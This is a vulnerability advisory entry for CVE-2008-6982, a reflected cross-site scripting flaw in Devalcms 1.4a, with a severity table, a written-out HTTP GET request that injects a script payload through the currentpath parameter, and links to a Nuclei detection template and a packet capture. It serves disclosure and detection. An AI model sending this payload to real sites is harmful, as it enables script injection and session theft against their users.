| Title | Devalcms 1.4a - Cross-Site Scripting |
|---|---|
| Author | arafatansari |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 4.3 |
| EPSS Score | 0.08587 |
| CVE ID | CVE-2008-6982 |
| CWE ID | CWE-79 |
| Tags | cve cve2008 devalcms xss cms edb vuln |
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
GET /index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2008/CVE-2008-6982.yaml
🦈 Packet Capture: ⬇️ Download cve-2008-6982.pcap
N/AN/A